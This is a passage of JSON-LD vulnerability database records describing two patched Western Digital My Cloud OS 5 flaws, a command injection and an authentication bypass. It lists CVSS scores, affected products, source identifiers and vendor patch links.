"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Adjacent Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 8.3,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2022-22991",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CNVD-2022-06494",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"author": "psirt@wdc.com",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.4,
"impactScore": 5.8,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2022-22991",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "ZDI",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2022-22991",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2022-22991",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "psirt@wdc.com",
"id": "CVE-2022-22991",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "ZDI",
"id": "CVE-2022-22991",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2022-06494",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202201-1069",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2022-22991",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-077"
},
{
"db": "CNVD",
"id": "CNVD-2022-06494"
},
{
"db": "VULMON",
"id": "CVE-2022-22991"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-003514"
},
{
"db": "CNNVD",
"id": "CNNVD-202201-1069"
},
{
"db": "NVD",
"id": "CVE-2022-22991"
},
{
"db": "NVD",
"id": "CVE-2022-22991"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A malicious user on the same LAN could use DNS spoofing followed by a command injection attack to trick a NAS device into loading through an unsecured HTTP call. Addressed this vulnerability by disabling checks for internet connectivity using HTTP. My Cloud OS 5 Firmware contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Western Digital MyCloud PR4100. Authentication is not required to exploit this vulnerability.The specific flaw exists within the ConnectivityService service. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Western Digital My Cloud is a personal cloud storage device from Western Digital",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-22991"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-003514"
},
{
"db": "ZDI",
"id": "ZDI-22-077"
},
{
"db": "CNVD",
"id": "CNVD-2022-06494"
},
{
"db": "VULMON",
"id": "CVE-2022-22991"
}
],
"trust": 2.88
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2022-22991",
"trust": 4.6
},
{
"db": "ZDI",
"id": "ZDI-22-077",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2022-003514",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-15856",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2022-06494",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022021810",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202201-1069",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2022-22991",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-077"
},
{
"db": "CNVD",
"id": "CNVD-2022-06494"
},
{
"db": "VULMON",
"id": "CVE-2022-22991"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-003514"
},
{
"db": "CNNVD",
"id": "CNNVD-202201-1069"
},
{
"db": "NVD",
"id": "CVE-2022-22991"
}
]
},
"id": "VAR-202201-0613",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-06494"
}
],
"trust": 1.45714287
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-06494"
}
]
},
"last_update_date": "2024-02-13T22:43:24.117000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "WDC-22002",
"trust": 1.5,
"url": "https://www.westerndigital.com/support/product-security/wdc-22002-my-cloud-os5-firmware-5-19-117"
},
{
"title": "Patch for Western Digital My Cloud OS 5 Command Injection Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/315881"
},
{
"title": "Western Digital My Cloud Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=178298"
},
{
"title": "CVE-2022-XXXX",
"trust": 0.1,
"url": "https://github.com/alphabugx/cve-2022-23305 "
},
{
"title": "CVE-2022-XXXX",
"trust": 0.1,
"url": "https://github.com/alphabugx/cve-2022-rce "
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-077"
},
{
"db": "CNVD",
"id": "CNVD-2022-06494"
},
{
"db": "VULMON",
"id": "CVE-2022-22991"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-003514"
},
{
"db": "CNNVD",
"id": "CNNVD-202201-1069"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-77",
"trust": 1.0
},
{
"problemtype": "Command injection (CWE-77) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-003514"
},
{
"db": "NVD",
"id": "CVE-2022-22991"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://www.zerodayinitiative.com/advisories/zdi-22-077/"
},
{
"trust": 3.0,
"url": "https://www.westerndigital.com/support/product-security/wdc-22002-my-cloud-os5-firmware-5-19-117"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22991"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022021810"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/77.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/alphabugx/cve-2022-23305"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-077"
},
{
"db": "CNVD",
"id": "CNVD-2022-06494"
},
{
"db": "VULMON",
"id": "CVE-2022-22991"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-003514"
},
{
"db": "CNNVD",
"id": "CNNVD-202201-1069"
},
{
"db": "NVD",
"id": "CVE-2022-22991"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-22-077"
},
{
"db": "CNVD",
"id": "CNVD-2022-06494"
},
{
"db": "VULMON",
"id": "CVE-2022-22991"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-003514"
},
{
"db": "CNNVD",
"id": "CNNVD-202201-1069"
},
{
"db": "NVD",
"id": "CVE-2022-22991"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-01-17T00:00:00",
"db": "ZDI",
"id": "ZDI-22-077"
},
{
"date": "2022-01-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2022-06494"
},
{
"date": "2022-01-13T00:00:00",
"db": "VULMON",
"id": "CVE-2022-22991"
},
{
"date": "2023-02-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-003514"
},
{
"date": "2022-01-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202201-1069"
},
{
"date": "2022-01-13T21:15:08.980000",
"db": "NVD",
"id": "CVE-2022-22991"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-01-18T00:00:00",
"db": "ZDI",
"id": "ZDI-22-077"
},
{
"date": "2022-01-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2022-06494"
},
{
"date": "2022-01-21T00:00:00",
"db": "VULMON",
"id": "CVE-2022-22991"
},
{
"date": "2023-02-22T05:41:00",
"db": "JVNDB",
"id": "JVNDB-2022-003514"
},
{
"date": "2022-02-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202201-1069"
},
{
"date": "2022-01-21T16:33:52.383000",
"db": "NVD",
"id": "CVE-2022-22991"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202201-1069"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "My\u00a0Cloud\u00a0OS\u00a05\u00a0 Command injection vulnerability in firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-003514"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "command injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202201-1069"
}
],
"trust": 0.6
}
}
VAR-202201-0612
Vulnerability from variot - Updated: 2024-02-13 22:43A limited authentication bypass vulnerability was discovered that could allow an attacker to achieve remote code execution and escalate privileges on the My Cloud devices. Addressed this vulnerability by changing access token validation logic and rewriting rule logic on PHP scripts. My Cloud There is an authentication vulnerability in the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of Western Digital MyCloud PR4100. Authentication is not required to exploit this vulnerability.The specific flaw exists within the nasAdmin service, which listens on TCP ports 80 and 443 by default. The issue results from incorrect string matching logic when accessing protected pages. An attacker can leverage this vulnerability to bypass authentication on the system. Western Digital My Cloud is a personal cloud storage device from Western Digital
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202201-0612",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "my cloud os",
"scope": "lt",
"trust": 1.0,
"vendor": "westerndigital",
"version": "5.19.117"
},
{
"model": "my cloud os 5",
"scope": "eq",
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my cloud os 5",
"scope": null,
"trust": 0.8,
"vendor": "western digital",
"version": null
},
{
"model": "my cloud os 5",
"scope": "eq",
"trust": 0.8,
"vendor": "western digital",
"version": "my cloud os 5 firmware"
},
{
"model": "mycloud pr4100",
"scope": null,
"trust": 0.7,
"vendor": "western digital",
"version": null
},
{
"model": "digital my cloud os",
"scope": "eq",
"trust": 0.6,
"vendor": "western",
"version": "5"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-347"
},
{
"db": "CNVD",
"id": "CNVD-2022-06493"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-003515"
},
{
"db": "NVD",
"id": "CVE-2022-22990"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:westerndigital:my_cloud_os:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.19.117",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_dl2100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_dl4100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_ex2_ultra:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_ex2100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_ex4100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_mirror_gen_2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_pr2100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:my_cloud_pr4100:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
},
{
"cpe23Uri": "cpe:2.3:h:westerndigital:wd_cloud:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-22990"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sam Thomas (@_s_n_t) of Pentest Ltd (@pentestltd)",
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-347"
},
{
"db": "CNNVD",
"id": "CNNVD-202201-1068"
}
],
"trust": 1.3
},
"cve": "CVE-2022-22990",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Adjacent Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 8.3,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2022-22990",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CNVD-2022-06493",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"author": "psirt@wdc.com",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.4,
"impactScore": 5.8,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2022-22990",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "ZDI",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2022-22990",
"impactScore": 3.4,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2022-22990",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "psirt@wdc.com",
"id": "CVE-2022-22990",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "ZDI",
"id": "CVE-2022-22990",
"trust": 0.7,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2022-06493",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202201-1068",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2022-22990",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-347"
},
{
"db": "CNVD",
"id": "CNVD-2022-06493"
},
{
"db": "VULMON",
"id": "CVE-2022-22990"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-003515"
},
{
"db": "CNNVD",
"id": "CNNVD-202201-1068"
},
{
"db": "NVD",
"id": "CVE-2022-22990"
},
{
"db": "NVD",
"id": "CVE-2022-22990"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A limited authentication bypass vulnerability was discovered that could allow an attacker to achieve remote code execution and escalate privileges on the My Cloud devices. Addressed this vulnerability by changing access token validation logic and rewriting rule logic on PHP scripts. My Cloud There is an authentication vulnerability in the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of Western Digital MyCloud PR4100. Authentication is not required to exploit this vulnerability.The specific flaw exists within the nasAdmin service, which listens on TCP ports 80 and 443 by default. The issue results from incorrect string matching logic when accessing protected pages. An attacker can leverage this vulnerability to bypass authentication on the system. Western Digital My Cloud is a personal cloud storage device from Western Digital",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-22990"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-003515"
},
{
"db": "ZDI",
"id": "ZDI-22-347"
},
{
"db": "CNVD",
"id": "CNVD-2022-06493"
},
{
"db": "VULMON",
"id": "CVE-2022-22990"
}
],
"trust": 2.88
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2022-22990",
"trust": 4.6
},
{
"db": "ZDI",
"id": "ZDI-22-347",
"trust": 3.2
},
{
"db": "ZDI",
"id": "ZDI-22-076",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2022-003515",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-15888",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2022-06493",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022021810",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202201-1068",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2022-22990",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-22-347"
},
{
"db": "CNVD",
"id": "CNVD-2022-06493"
},
{
"db": "VULMON",
"id": "CVE-2022-22990"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-003515"
},
{
"db": "CNNVD",
"id": "CNNVD-202201-1068"
},
{
"db": "NVD",
"id": "CVE-2022-22990"
}
]
},
"id": "VAR-202201-0612",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-06493"
}
],
"trust": 1.45714287
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-06493"
}
]
},
"last_update_date": "2024-02-13T22:43:24.083000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "WDC-22002",
"trust": 1.5,
"url": "https://www.westerndigital.com/support/product-security/wdc-22002-my-cloud-os5-firmware-5-19-117"
},
{
